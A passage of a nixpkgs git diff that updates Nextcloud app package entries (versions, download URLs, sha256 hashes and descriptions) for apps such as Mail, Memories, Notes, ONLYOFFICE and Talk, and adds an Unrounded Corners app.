usage.\n\n\n### Rating for Speech-To-Text using Whisper via LocalAI: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/integration_openai", "licenses": [ "agpl" ] }, "mail": { - "sha256": "122qyz6d9771ivpl771g5wi3lxsd2g3v64n9cp5clm8p662msjfi", - "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.5.7/mail-v3.5.7.tar.gz", - "version": "3.5.7", + "sha256": "1m48zdh7jjmgw7r9y9irp7z22wjippjswy7r60yvsdxbac765n14", + "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.6.0/mail-v3.6.0.tar.gz", + "version": "3.6.0", "description": "**💌 A mail app for Nextcloud**\n\n- **🚀 Integration with other Nextcloud apps!** Currently Contacts, Calendar & Files – more to come.\n- **📥 Multiple mail accounts!** Personal and company account? No problem, and a nice unified inbox. Connect any IMAP account.\n- **🔒 Send & receive encrypted mails!** Using the great [Mailvelope](https://mailvelope.com) browser extension.\n- **🙈 We’re not reinventing the wheel!** Based on the great [Horde](https://horde.org) libraries.\n- **📬 Want to host your own mail server?** We do not have to reimplement this as you could set up [Mail-in-a-Box](https://mailinabox.email)!\n\n## Ethical AI Rating\n\n### Priority Inbox\n\nPositive:\n* The software for training and inferencing of this model is open source.\n* The model is created and trained on-premises based on the user's own data.\n* The training data is accessible to the user, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n### Thread Summaries (opt-in)\n\n**Rating:** 🟢/🟡/🟠/🔴\n\nThe rating depends on the installed text processing backend. See [the rating overview](https://docs.nextcloud.com/server/latest/admin_manual/ai/index.html) for details.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/mail#readme", "licenses": [ @@ -160,9 +160,9 @@ ] }, "memories": { - "sha256": "0638120x6byp35gslcr2yg4rswihjjdssnjw87fxx7q41sd02vsz", - "url": "https://github.com/pulsejet/memories/releases/download/v7.0.2/memories.tar.gz", - "version": "7.0.2", + "sha256": "02l9rq117x7x4nra1f50fkn7yr3cpbjnsq9nlr7rnsn9qsf5rrw9", + "url": "https://github.com/pulsejet/memories/releases/download/v7.2.0/memories.tar.gz", + "version": "7.2.0", "description": "# Memories: Photo Management for Nextcloud\n\nMemories is a *batteries-included* photo management solution for Nextcloud with advanced features including:\n\n- **📸 Timeline**: Sort photos and videos by date taken, parsed from Exif data.\n- **⏪ Rewind**: Jump to any time in the past instantly and relive your memories.\n- **🤖 AI Tagging**: Group photos by people and objects, powered by [recognize](https://github.com/nextcloud/recognize) and [facerecognition](https://github.com/matiasdelellis/facerecognition).\n- **🖼️ Albums**: Create albums to group photos and videos together. Then share these albums with others.\n- **🫱🏻🫲🏻 External Sharing**: Share photos and videos with people outside of your Nextcloud instance.\n- **📱 Mobile Support**: Work from any device, of any shape and size through the web app.\n- **✏️ Edit Metadata**: Edit dates and other metadata on photos quickly and in bulk.\n- **📦 Archive**: Store photos you don't want to see in your timeline in a separate folder.\n- **📹 Video Transcoding**: Transcode videos and use HLS for maximal performance.\n- **🗺️ Map**: View your photos on a map, tagged with accurate reverse geocoding.\n- **📦 Migration**: Migrate easily from Nextcloud Photos and Google Takeout.\n- **⚡️ Performance**: Do all this very fast.\n\n## 🚀 Installation\n\n1. Install the app from the Nextcloud app store (try a demo [here](https://demo.memories.gallery/apps/memories/)).\n1. Perform the recommended [configuration steps](https://memories.gallery/config/).\n1. Run `php occ memories:index` to generate metadata indices for existing photos.\n1. Open the 📷 Memories app in Nextcloud and set the directory containing your photos.", "homepage": "https://memories.gallery", "licenses": [ @@ -170,9 +170,9 @@ ] }, "music": { - "sha256": "1afjqvmcim1r22bs5vpp2b2wd01df5xdchw6ifqf57vgb7nzzkbs", - "url": "https://github.com/owncloud/music/releases/download/v1.10.0/music_1.10.0_for_nextcloud.tar.gz", - "version": "1.10.0", + "sha256": "04dh6vzriiiqnn02pjbwn9rv0q427njbx558jl504jp91b8qd2wn", + "url": "https://github.com/owncloud/music/releases/download/v1.11.0/music_1.11.0_for_nextcloud.tar.gz", + "version": "1.11.0", "description": "A stand-alone music player app and a \"lite\" player for the Files app\n\n- On modern browsers, supports audio types .mp3, .ogg, .m4a, .m4b, .flac, .wav, and more\n- Playlist support with import from m3u, m3u8, and pls files\n- Browse by artists, albums, genres, or folders\n- Gapless play\n- Filter the shown content with the search function\n- Play internet radio and podcast channels\n- Setup Last.fm connection to see background information on artists, albums, and songs\n- Control with media control keys on the keyboard or OS\n- The app can handle libraries consisting of thousands of albums and tens of thousands of songs\n- Includes a server backend compatible with the Subsonic and Ampache protocols, allowing playback and browsing of your library on various external apps e.g. on Android or iPhone", "homepage": "https://github.com/owncloud/music", "licenses": [ @@ -190,9 +190,9 @@ ] }, "notes": { - "sha256": "1ii3ii2062wklss3mxsfbvqi4hvi96a20i20lbwm6z2x6q7fqqi3", - "url": "https://github.com/nextcloud-releases/notes/releases/download/v4.9.4/notes-v4.9.4.tar.gz", - "version": "4.9.4", + "sha256": "0j9bwbfvwwdaabyc79i514sp36cm4i9z02l8bkxlqr9fvim73nn9", + "url": "https://github.com/nextcloud-releases/notes/releases/download/v4.10.0/notes.tar.gz", + "version": "4.10.0", "description": "The Notes app is a distraction free notes taking app for [Nextcloud](https://www.nextcloud.com/). It provides categories for better organization and supports formatting using [Markdown](https://en.wikipedia.org/wiki/Markdown) syntax. Notes are saved as files in your Nextcloud, so you can view and edit them with every Nextcloud client. Furthermore, a separate [REST API](https://github.com/nextcloud/notes/blob/master/docs/api/README.md) allows for an easy integration into third-party apps (currently, there are notes apps for [Android](https://github.com/nextcloud/notes-android), [iOS](https://github.com/nextcloud/notes-ios) and the [console](https://git.danielmoch.com/nncli/about) which allow convenient access to your Nextcloud notes). Further features include marking notes as favorites.", "homepage": "https://github.com/nextcloud/notes", "licenses": [ @@ -210,9 +210,9 @@ ] }, "onlyoffice": { - "sha256": "0hf015rvramksh7v06n7pn5kmyhgqzg17vmrgfqjbndg1r6rghpc", - "url": "https://github.com/ONLYOFFICE/onlyoffice-nextcloud/releases/download/v7.9.4/onlyoffice.tar.gz", - "version": "7.9.4", + "sha256": "0md102hk29pakjxmybyhdqwh0hxvxpdxdki8y7wpk498gza3qmyh", + "url": "https://github.com/ONLYOFFICE/onlyoffice-nextcloud/releases/download/v7.10/onlyoffice.tar.gz", + "version": "7.10.0", "description": "ONLYOFFICE connector allows you to view, edit and collaborate on text documents, spreadsheets and presentations within Nextcloud using ONLYOFFICE Docs. This will create a new Edit in ONLYOFFICE action within the document library for Office documents. This allows multiple users to co-author documents in real time from the familiar web interface and save the changes back to your file storage.", "homepage": "https://www.onlyoffice.com", "licenses": [ @@ -240,9 +240,9 @@ ] }, "previewgenerator": { - "sha256": "08f0ivxqa2b54w2q4lycb3p5ngqyk92n2qll54pmpj54pfn1sj3m", - "url": "https://github.com/nextcloud-releases/previewgenerator/releases/download/v5.4.0/previewgenerator-v5.4.0.tar.gz", - "version": "5.4.0", + "sha256": "0505kg4pxa6dqylniwa5ip6h5bama8cp0ng2y7prhb93mnhgr051", + "url": "https://github.com/nextcloud-releases/previewgenerator/releases/download/v5.5.0/previewgenerator-v5.5.0.tar.gz", + "version": "5.5.0", "description": "The Preview Generator app allows admins to pre-generate previews. The app listens to edit events and stores this information. Once a cron job is triggered it will generate start preview generation. This means that you can better utilize your system by pre-generating previews when your system is normally idle and thus putting less load on your machine when the requests are actually served.\n\nThe app does not replace on demand preview generation so if a preview is requested before it is pre-generated it will still be shown.\nThe first time you install this app, before using a cron job, you properly want to generate all previews via:\n**./occ preview:generate-all -vvv**\n\n**Important**: To enable pre-generation of previews you must add **php /var/www/nextcloud/occ preview:pre-generate** to a system cron job that runs at times of your choosing.", "homepage": "https://github.com/nextcloud/previewgenerator", "licenses": [ @@ -250,9 +250,9 @@ ] }, "qownnotesapi": { - "sha256": "1pyr4b3w6gsy83ci6cy0wfv870qm2v957nl4w6xk989iyknk4ana", - "url": "https://github.com/pbek/qownnotesapi/releases/download/v23.12.0/qownnotesapi-nc.tar.gz", - "version": "23.12.0", + "sha256": "0y4cv4hagmax4nkdfzysd5fg2h2xak4m87waf3b0ci5f1bwdxdxx", + "url": "https://github.com/pbek/qownnotesapi/releases/download/v24.4.0/qownnotesapi-nc.tar.gz", + "version": "24.4.0", "description": "QOwnNotesAPI is the Nextcloud/ownCloud API for [QOwnNotes](http://www.qownnotes.org), the open source notepad for Linux, macOS and Windows, that works together with the notes application of Nextcloud/ownCloud.\n\nThe only purpose of this App is to provide API access to your Nextcloud/ownCloud server for your QOwnNotes desktop installation, you cannot use this App for anything else, if you don't have QOwnNotes installed on your desktop computer!", "homepage": "https://github.com/pbek/qownnotesapi", "licenses": [ @@ -273,7 +273,7 @@ "sha256": "1d04y6jjhk41ghykqwxca4vmjlpn8cwlabqd9hjsccr2845gksad", "url": "https://github.com/nextcloud-releases/spreed/releases/download/v16.0.11/spreed-v16.0.11.tar.gz", "version": "16.0.11", - "description": "Chat, video & audio-conferencing using WebRTC\n\n* 💬 **Chat integration!** Nextcloud Talk comes with a simple text chat. Allowing you to share files from your Nextcloud and mentioning other participants.\n* 👥 **Private, group, public and password protected calls!** Just invite somebody, a whole group or send a public link to invite to a call.\n* 💻 **Screen sharing!** Share your screen with participants of your call. You just need to use Firefox version 66 (or newer), latest Edge or Chrome 72 (or newer, also possible using Chrome 49 with this [Chrome extension](https://chrome.google.com/webstore/detail/screensharing-for-nextclo/kepnpjhambipllfmgmbapncekcmabkol)).\n* 🚀 **Integration with other Nextcloud apps** like Files, Contacts and Deck. More to come.\n\nAnd in the works for the [coming versions](https://github.com/nextcloud/spreed/milestones/):\n* ✋ [Federated calls](https://github.com/nextcloud/spreed/issues/21), to call people on other Nextclouds", + "description": "Chat, video & audio-conferencing using WebRTC\n\n* 💬 **Chat** Nextcloud Talk comes with a simple text chat, allowing you to share or upload files from your Nextcloud Files app or local device and mention other participants.\n* 👥 **Private, group, public and password protected calls!** Invite someone, a whole group or send a public link to invite to a call.\n* 🌐 **Federated chats** Chat with other Nextcloud users on their servers\n* 💻 **Screen sharing!** Share your screen with the participants of your call.\n* 🚀 **Integration with other Nextcloud apps** like Files, Calendar, User status, Dashboard, Flow, Maps, Smart picker, Contacts, Deck, and many more.\n* 🌉 **Sync with other chat solutions** With [Matterbridge](https://github.com/42wim/matterbridge/) being integrated in Talk, you can easily sync a lot of other chat solutions to Nextcloud Talk and vice-versa.", "homepage": "https://github.com/nextcloud/spreed", "licenses": [ "agpl" @@ -309,6 +309,16 @@ "agpl" ] }, + "unroundedcorners": { + "sha256": "1ykgnwv41n4i1gwlbgxqflgrl68qc7byvlx4a8clbzhryn2745jf", + "url": "https://github.com/OliverParoczai/nextcloud-unroundedcorners/releases/download/v1.0.9/unroundedcorners-v1.0.9.tar.gz", + "version": "1.0.9", + "description": "# Unrounded Corners\nA Nextcloud app that restores the corners of buttons and widgets to their original looks by unrounding them.", + "homepage": "https://github.com/OliverParoczai/nextcloud-unroundedcorners", + "licenses": [ + "agpl" + ] + }, "unsplash": { "sha256": "1ya1h4nb9cyj1hdgb5l5isx7a43a7ri92cm0h8nwih20hi6a9wzx", "url": "https://github.com/nextcloud/unsplash/releases/download/v2.2.1/unsplash.tar.gz", diff --git a/pkgs/servers/nextcloud/packages/27.json b/pkgs/servers/nextcloud/packages/27.json index cb95aed36ec20..987fb94b15f0f 100644 --- a/pkgs/servers/nextcloud/packages/27.json +++ b/pkgs/servers/nextcloud/packages/27.json @@ -10,9 +10,9 @@ ] }, "calendar": { - "sha256": "18hlk6j3dzpcd61sgn8r8zmcc9d1bklq030kwyn4mzr20dcf75w5", - "url": "https://github.com/nextcloud-releases/calendar/releases/download/v4.6.7/calendar-v4.6.7.tar.gz", - "version": "4.6.7", + "sha256": "10sxr8xczq29a3c5a7n074hpx80a21m6v7a2xhz0yhv9q80yv5gz", + "url": "https://github.com/nextcloud-releases/calendar/releases/download/v4.7.0/calendar-v4.7.0.tar.gz", + "version": "4.7.0", "description": "The Calendar app is a user interface for Nextcloud's CalDAV server. Easily sync events from various devices with your Nextcloud and edit them online.\n\n* 🚀 **Integration with other Nextcloud apps!** Currently Contacts - more to come.\n* 🌐 **WebCal Support!** Want to see your favorite team’s matchdays in your calendar? No problem!\n* 🙋 **Attendees!** Invite people to your events\n* ⌚️ **Free/Busy!** See when your attendees are available to meet\n* ⏰ **Reminders!** Get alarms for events inside your browser and via email\n* 🔍 Search! Find your events at ease\n* ☑️ Tasks! See tasks with a due date directly in the calendar\n* 🙈 **We’re not reinventing the wheel!** Based on the great [c-dav library](https://github.com/nextcloud/cdav-library), [ical.js](https://github.com/mozilla-comm/ical.js) and [fullcalendar](https://github.com/fullcalendar/fullcalendar) libraries.", "homepage": "https://github.com/nextcloud/calendar/", "licenses": [ @@ -90,9 +90,9 @@ ] }, "forms": { - "sha256": "1nwsbl3lh0s4if4665b1z7nf7r62chazfb5g3fdrlffrrrqbdj4y", - "url": "https://github.com/nextcloud-releases/forms/releases/download/v3.4.6/forms-v3.4.6.tar.gz", - "version": "3.4.6", + "sha256": "0shdkqhip988dng2105k5cjbqfqny5791h8gdachcv3vnq99fywi", + "url": "https://github.com/nextcloud-releases/forms/releases/download/v3.4.7/forms-v3.4.7.tar.gz", + "version": "3.4.7", "description": "**Simple surveys and questionnaires, self-hosted!**\n\n- **📝 Simple design:** No mass of options, only the essentials. Works well on mobile of course.\n- **📊 View & export results:** Results are visualized and can also be exported as CSV in the same format used by Google Forms.\n- **🔒 Data under your control!** Unlike in Google Forms, Typeform, Doodle and others, the survey info and responses are kept private on your instance.\n- **🧑💻 Connect to your software:** Easily integrate Forms into your service with our full-fledged [REST-API](https://github.com/nextcloud/forms/blob/main/docs/API.md).\n- **🙋 Get involved!** We have lots of stuff planned like more question types, collaboration on forms, [and much more](https://github.com/nextcloud/forms/milestones)!", "homepage": "https://github.com/nextcloud/forms", "licenses": [ @@ -110,9 +110,9 @@ ] }, "groupfolders": { - "sha256": "00pjva8hc36mnawvbpsi6lizzdhclp30z92vaz8j24xmhf21yvh9", - "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v15.3.6/groupfolders-v15.3.6.tar.gz", - "version": "15.3.6", + "sha256": "00c387vjz5sxw3gv61m4p3jby50bcadk8dwpz0zsd5wbhwffd63q", + "url": "https://github.com/nextcloud-releases/groupfolders/releases/download/v15.3.7/groupfolders-v15.3.7.tar.gz", + "version": "15.3.7", "description": "Admin configured folders shared with everyone in a group.\n\nFolders can be configured from *Group folders* in the admin settings.\n\nAfter a folder is created, the admin can give access to the folder to one or more groups, control their write/sharing permissions and assign a quota for the folder.\n\nNote: Encrypting the contents of group folders is currently not supported.", "homepage": "https://github.com/nextcloud/groupfolders", "licenses": [ @@ -133,16 +133,16 @@ "sha256": "1cb5csdn85y5fkwhbxxl9i1qy92iqx9v9ccavcp66xfpyk4dlf22", "url": "https://github.com/nextcloud-releases/integration_openai/releases/download/v1.1.5/integration_openai-v1.1.5.tar.gz", "version": "1.1.5", - "description": "This app includes 3 custom smart pickers for Nextcloud:\n* ChatGPT-like answers\n* Image generation (with DALL·E 2 or LocalAI)\n* Whisper dictation\n\nIt also implements\n\n* A Translation provider (using any available language model)\n* A SpeechToText provider (using Whisper)\n\nInstead of connecting to the OpenAI API for these, you can also connect to a self-hosted [LocalAI](https://localai.io) instance.\n\n## Ethical AI Rating\n### Rating for Text generation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n\n### Rating for Translation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n### Rating for Image generation using DALL·E via OpenAI API: 🔴\n\nNegative:\n* the software for training and inferencing of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be ran on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via OpenAI API: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* The trained model is freely available, and thus can run on-premise\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n### Rating for Text generation via LocalAI: 🟢\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n* the training data is freely available, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n\n### Rating for Image generation using Stable Diffusion via LocalAI : 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via LocalAI: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", + "description": "⚠️ The smart pickers have been removed from this app\nas they are now included in the [Assistant app](https://apps.nextcloud.com/apps/assistant).\n\nThis app implements:\n\n* Text generation providers: Free prompt, Summarize, Headline and Reformulate (using any available large language model)\n* A Translation provider (using any available language model)\n* A SpeechToText provider (using Whisper)\n* An image generation provider\n\nInstead of connecting to the OpenAI API for these, you can also connect to a self-hosted [LocalAI](https://localai.io) instance\nor to any service that implements an API similar to the OpenAI one, for example: [Plusserver](https://www.plusserver.com/en/ai-platform/).\n\n## Ethical AI Rating\n### Rating for Text generation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n\n### Rating for Translation using ChatGPT via OpenAI API: 🔴\n\nNegative:\n* the software for training and inference of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be run on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model's performance and CO2 usage.\n\n### Rating for Image generation using DALL·E via OpenAI API: 🔴\n\nNegative:\n* the software for training and inferencing of this model is proprietary, limiting running it locally or training by yourself\n* the trained model is not freely available, so the model can not be ran on-premises\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via OpenAI API: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* The trained model is freely available, and thus can run on-premise\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n### Rating for Text generation via LocalAI: 🟢\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n* the training data is freely available, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n\n### Rating for Image generation using Stable Diffusion via LocalAI : 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\n\n### Rating for Speech-To-Text using Whisper via LocalAI: 🟡\n\nPositive:\n* the software for training and inferencing of this model is open source\n* the trained model is freely available, and thus can be ran on-premises\n\nNegative:\n* the training data is not freely available, limiting the ability of external parties to check and correct for bias or optimise the model’s performance and CO2 usage.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/integration_openai", "licenses": [ "agpl" ] }, "mail": { - "sha256": "122qyz6d9771ivpl771g5wi3lxsd2g3v64n9cp5clm8p662msjfi", - "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.5.7/mail-v3.5.7.tar.gz", - "version": "3.5.7", + "sha256": "1m48zdh7jjmgw7r9y9irp7z22wjippjswy7r60yvsdxbac765n14", + "url": "https://github.com/nextcloud-releases/mail/releases/download/v3.6.0/mail-v3.6.0.tar.gz", + "version": "3.6.0", "description": "**💌 A mail app for Nextcloud**\n\n- **🚀 Integration with other Nextcloud apps!** Currently Contacts, Calendar & Files – more to come.\n- **📥 Multiple mail accounts!** Personal and company account? No problem, and a nice unified inbox. Connect any IMAP account.\n- **🔒 Send & receive encrypted mails!** Using the great [Mailvelope](https://mailvelope.com) browser extension.\n- **🙈 We’re not reinventing the wheel!** Based on the great [Horde](https://horde.org) libraries.\n- **📬 Want to host your own mail server?** We do not have to reimplement this as you could set up [Mail-in-a-Box](https://mailinabox.email)!\n\n## Ethical AI Rating\n\n### Priority Inbox\n\nPositive:\n* The software for training and inferencing of this model is open source.\n* The model is created and trained on-premises based on the user's own data.\n* The training data is accessible to the user, making it possible to check or correct for bias or optimise the performance and CO2 usage.\n\n### Thread Summaries (opt-in)\n\n**Rating:** 🟢/🟡/🟠/🔴\n\nThe rating depends on the installed text processing backend. See [the rating overview](https://docs.nextcloud.com/server/latest/admin_manual/ai/index.html) for details.\n\nLearn more about the Nextcloud Ethical AI Rating [in our blog](https://nextcloud.com/blog/nextcloud-ethical-ai-rating/).", "homepage": "https://github.com/nextcloud/mail#readme", "licenses": [ @@ -160,9 +160,9 @@ ] }, "memories": { - "sha256": "0638120x6byp35gslcr2yg4rswihjjdssnjw87fxx7q41sd02vsz", - "url": "https://github.com/pulsejet/memories/releases/download/v7.0.2/memories.tar.gz", - "version": "7.0.2", + "sha256": "02l9rq117x7x4nra1f50fkn7yr3cpbjnsq9nlr7rnsn9qsf5rrw9", + "url": "https://github.com/pulsejet/memories/releases/download/v7.2.0/memories.tar.gz", + "version": "7.2.0", "description": "# Memories: Photo Management for Nextcloud\n\nMemories is a *batteries-included* photo management solution for Nextcloud with advanced features including:\n\n- **📸 Timeline**: Sort photos and videos by date taken, parsed from Exif data.\n- **⏪ Rewind**: Jump to any time in the past instantly and relive your memories.\n- **🤖 AI Tagging**: Group photos by people and objects, powered by [recognize](https://github.com/nextcloud/recognize) and [facerecognition](https://github.com/matiasdelellis/facerecognition).\n- **🖼️ Albums**: Create albums to group photos and videos together. Then share these albums with others.\n- **🫱🏻🫲🏻 External Sharing**: Share photos and videos with people outside of your Nextcloud instance.\n- **📱 Mobile Support**: Work from any device, of any shape and size through the web app.\n- **✏️ Edit Metadata**: Edit dates and other metadata on photos quickly and in bulk.\n- **📦 Archive**: Store photos you don't want to see in your timeline in a separate folder.\n- **📹 Video Transcoding**: Transcode videos and use HLS for maximal performance.\n- **🗺️ Map**: View your photos on a map, tagged with accurate reverse geocoding.\n- **📦 Migration**: Migrate easily from Nextcloud Photos and Google Takeout.\n- **⚡️ Performance**: Do all this very fast.\n\n## 🚀 Installation\n\n1. Install the app from the Nextcloud app store (try a demo [here](https://demo.memories.gallery/apps/memories/)).\n1. Perform the recommended [configuration steps](https://memories.gallery/config/).\n1. Run `php occ memories:index` to generate metadata indices for existing photos.\n1. Open the 📷 Memories app in Nextcloud and set the directory containing your photos.", "homepage": "https://memories.gallery", "licenses": [ @@ -170,9 +170,9 @@ ] }, "music": { - "sha256": "1afjqvmcim1r22bs5vpp2b2wd01df5xdchw6ifqf57vgb7nzzkbs", - "url": "https://github.com/owncloud/music/releases/download/v1.10.0/music_1.10.0_for_nextcloud.tar.gz", - "version": "1.10.0", + "sha256": "04dh6vzriiiqnn02pjbwn9rv0q427njbx558jl504jp91b8qd2wn", + "url": "https://github.com/owncloud/music/releases/download/v1.11.0/music_1.11.0_for_nextcloud.tar.gz", + "version": "1.11.0", "description": "A stand-alone music player app and a \"lite\" player for the Files app\n\n- On modern browsers, supports audio types .mp3, .ogg, .m4a, .m4b, .flac, .wav, and more\n- Playlist support with import from m3u, m3u8, and pls files\n- Browse by artists, albums, genres, or folders\n- Gapless play\n- Filter the shown content with the search function\n- Play internet radio and podcast channels\n- Setup Last.fm connection to see background information on artists, albums, and songs\n- Control with media control keys on the keyboard or OS\n- The app can handle libraries consisting of thousands of albums and tens of thousands of songs\n- Includes a server backend compatible with the Subsonic and Ampache protocols, allowing playback and browsing of your library on various external apps e.g. on Android or iPhone", "homepage": "https://github.com/owncloud/music", "licenses": [ @@ -190,9 +190,9 @@ ] }, "notes": { - "sha256": "1ii3ii2062wklss3mxsfbvqi4hvi96a20i20lbwm6z2x6q7fqqi3", - "url": "https://github.com/nextcloud-releases/notes/releases/download/v4.9.4/notes-v4.9.4.tar.gz", - "version": "4.9.4", + "sha256": "0j9bwbfvwwdaabyc79i514sp36cm4i9z02l8bkxlqr9fvim73nn9", + "url": "https://github.com/nextcloud-releases/notes/releases/download/v4.10.0/notes.tar.gz", + "version": "4.10.0", "description": "The Notes app is a distraction free notes taking app for [Nextcloud](https://www.nextcloud.com/). It provides categories for better organization and supports formatting using [Markdown](https://en.wikipedia.org/wiki/Markdown) syntax. Notes are saved as files in your Nextcloud, so you can view and edit them with every Nextcloud client. Furthermore, a separate [REST API](https://github.com/nextcloud/notes/blob/master/docs/api/README.md) allows for an easy integration into third-party apps (currently, there are notes apps for [Android](https://github.com/nextcloud/notes-android), [iOS](https://github.com/nextcloud/notes-ios) and the [console](https://git.danielmoch.com/nncli/about) which allow convenient access to your Nextcloud notes). Further features include marking notes as favorites.", "homepage": "https://github.com/nextcloud/notes", "licenses": [ @@ -210,13 +210,13 @@ ] }, "onlyoffice": { - "sha256": "0wnlm12wy7vsjmgh49ag7mm51mr2h8m05vdiwzkrfm7zazgdwadh", - "url": "https://github.com/ONLYOFFICE/onlyoffice-nextcloud/releases/download/v8.2.4/onlyoffice.tar.gz", - "version": "8.2.4", + "sha256": "1hg6cs8rbvy00w541pd1qcr5l6xqnjz816pm2jyxqxm8dm5kag7a", + "url": "https://github.com/ONLYOFFICE/onlyoffice-nextcloud/releases/download/v9.1.2/onlyoffice.tar.gz", + "version": "9.1.2", "description": "ONLYOFFICE connector allows you to view, edit and collaborate on text documents, spreadsheets and presentations within Nextcloud using ONLYOFFICE Docs. This will create a new Edit in ONLYOFFICE action within the document library for Office documents. This allows multiple users to co-author documents in real time from the familiar web interface and save the changes back to your file storage.", "homepage": "https://www.onlyoffice.com", "licenses": [ - "apache" + "agpl" ] }, "phonetrack": { @@ -240,9 +240,9 @@ ] }, "previewgenerator": { - "sha256": "08f0ivxqa2b54w2q4lycb3p5ngqyk92n2qll54pmpj54pfn1sj3m", - "url": "https://github.com/nextcloud-releases/previewgenerator/releases/download/v5.4.0/previewgenerator-v5.4.0.tar.gz", - "version": "5.4.0", + "sha256": "0505kg4pxa6dqylniwa5ip6h5bama8cp0ng2y7prhb93mnhgr051", + "url": "https://github.com/nextcloud-releases/previewgenerator/releases/download/v5.5.0/previewgenerator-v5.5.0.tar.gz", + "version": "5.5.0", "description": "The Preview Generator app allows admins to pre-generate previews. The app listens to edit events and stores this information. Once a cron job is triggered it will generate start preview generation. This means that you can better utilize your system by pre-generating previews when your system is normally idle and thus putting less load on your machine when the requests are actually served.\n\nThe app does not replace on demand preview generation so if a preview is requested before it is pre-generated it will still be shown.\nThe first time you install this app, before using a cron job, you properly want to generate all previews via:\n**./occ preview:generate-all -vvv**\n\n**Important**: To enable pre-generation of previews you must add **php /var/www/nextcloud/occ preview:pre-generate** to a system cron job that runs at times of your choosing.", "homepage": "https://github.com/nextcloud/previewgenerator", "licenses": [ @@ -250,9 +250,9 @@ ] }, "qownnotesapi": { - "sha256": "1pyr4b3w6gsy83ci6cy0wfv870qm2v957nl4w6xk989iyknk4ana", - "url": "https://github.com/pbek/qownnotesapi/releases/download/v23.12.0/qownnotesapi-nc.tar.gz", - "version": "23.12.0", + "sha256": "0y4cv4hagmax4nkdfzysd5fg2h2xak4m87waf3b0ci5f1bwdxdxx", + "url": "https://github.com/pbek/qownnotesapi/releases/download/v24.4.0/qownnotesapi-nc.tar.gz", + "version": "24.4.0", "description": "QOwnNotesAPI is the Nextcloud/ownCloud API for [QOwnNotes](http://www.qownnotes.org), the open source notepad for Linux, macOS and Windows, that works together with the notes application of Nextcloud/ownCloud.\n\nThe only purpose of this App is to provide API access to your Nextcloud/ownCloud server for your QOwnNotes desktop installation, you cannot use this App for anything else, if you don't have QOwnNotes installed on your desktop computer!", "homepage": "https://github.com/pbek/qownnotesapi", "licenses": [ @@ -270,10 +270,10 @@ ] }, "spreed": { - "sha256": "0vlmgiwjqk8bjvjkamca4b97lqs5wj1c4xsdz87gd1zjz3ja4332", - "url": "https://github.com/nextcloud-releases/spreed/releases/download/v17.1.6/spreed-v17.1.6.tar.gz", - "version": "17.1.6", - "description": "Chat, video & audio-conferencing using WebRTC\n\n* 💬 **Chat integration!** Nextcloud Talk comes with a simple text chat. Allowing you to share files from your Nextcloud and mentioning other participants.\n* 👥 **Private, group, public and password protected calls!** Just invite somebody, a whole group or send a public link to invite to a call.\n* 💻 **Screen sharing!** Share your screen with participants of your call. You just need to use Firefox version 66 (or newer), latest Edge or Chrome 72 (or newer, also possible using Chrome 49 with this [Chrome 